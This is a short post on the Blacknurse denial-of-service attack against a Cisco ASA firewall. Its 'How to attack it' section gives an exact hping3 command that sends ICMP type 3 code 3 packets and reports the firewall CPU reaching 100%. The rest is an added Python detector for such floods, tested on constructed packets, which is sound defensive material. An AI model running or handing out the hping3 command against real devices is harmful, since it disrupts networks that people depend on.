Blacknurse DoS attack on Cisco ASA

Cisco ASA config:

Outside: 192.168.9.136/24
Inside: 192.168.1.1/24

How to attack it:
1. Get an Ubuntu or any other Linux server and install hping3 (apt-get install hping3).
2. Attack it:
hping3 -1 -C 3 -K 3 -i u20 192.168.9.136

Monitoring from Cisco ASA ASDM, the CPU load spikes to 100% in just a few seconds,
and services in the inside zone start to see packet loss to the outside zone, while the attacking Ubuntu host is sending just 5 kbps of traffic.

ICMP type 3 has been set to drop in the access rules, but this does not mitigate the issue.
Sadly, Cisco is not going to patch this; the only way to solve it is to replace the ASA 5506…
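
Because the flood described above is only about 5 kbps, bandwidth alarms will not notice it; counting ICMP type 3 code 3 packets per source upstream of the ASA is one way to spot it. This is an added example, not part of the original post: the threshold of 100 packets per second, the source addresses 192.168.9.50/.60/.70 and the packets themselves are constructed for illustration.

```python
import socket
import struct
from collections import defaultdict, deque

ICMP_PROTO = 1
BLACKNURSE = (3, 3)  # ICMP type 3, code 3: the -C 3 -K 3 pair in the command above

def parse_icmp(packet):
    """Return (src_ip, icmp_type, icmp_code) for a raw IPv4 ICMP packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4          # header length varies with IP options
    frag = struct.unpack("!H", packet[6:8])[0] & 0x1FFF
    if ihl < 20 or packet[9] != ICMP_PROTO or frag or len(packet) < ihl + 2:
        return None                        # later fragments carry no ICMP header
    return socket.inet_ntoa(packet[12:16]), packet[ihl], packet[ihl + 1]

def detect_flood(events, threshold=100, window_ms=1000):
    """events: (timestamp_ms, raw_packet) in time order.
    Returns {src_ip: peak packets per window} for sources above the threshold."""
    recent, peaks = defaultdict(deque), {}
    for ts, pkt in events:
        parsed = parse_icmp(pkt)
        if parsed is None or parsed[1:] != BLACKNURSE:
            continue
        q = recent[parsed[0]]
        q.append(ts)
        while ts - q[0] >= window_ms:      # slide the window forward
            q.popleft()
        if len(q) > threshold:
            peaks[parsed[0]] = max(peaks.get(parsed[0], 0), len(q))
    return peaks

def build_packet(src, dst, icmp_type, icmp_code):
    """Constructed sample: 20-byte IPv4 header + 8-byte ICMP header, checksums zero."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, ICMP_PROTO, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + struct.pack("!BBHI", icmp_type, icmp_code, 0, 0)

def sample_events():
    # Constructed traffic: one flooding source, one pinging host, one stray sender.
    dst = "192.168.9.136"
    flood = [(i * 2, build_packet("192.168.9.50", dst, 3, 3)) for i in range(1000)]
    pings = [(i * 500, build_packet("192.168.9.60", dst, 8, 0)) for i in range(4)]
    stray = [(i * 400, build_packet("192.168.9.70", dst, 3, 3)) for i in range(5)]
    return sorted(flood + pings + stray, key=lambda e: e[0])

if __name__ == "__main__":
    for src, peak in detect_flood(sample_events()).items():
        print(f"{src}: {peak} ICMP type 3 code 3 packets within 1 s")
```

In the sample, only 192.168.9.50 is reported; the occasional unreachable messages from 192.168.9.70 and the echo requests from 192.168.9.60 stay below the threshold.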
